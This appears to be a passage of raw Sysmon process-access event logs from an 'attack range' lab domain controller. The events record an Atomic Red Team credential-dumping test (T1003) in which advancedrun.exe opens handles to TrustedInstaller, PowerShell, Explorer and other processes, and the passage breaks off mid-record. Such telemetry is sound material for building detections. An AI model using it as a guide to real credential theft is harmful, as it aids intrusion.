17:50:58.332{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 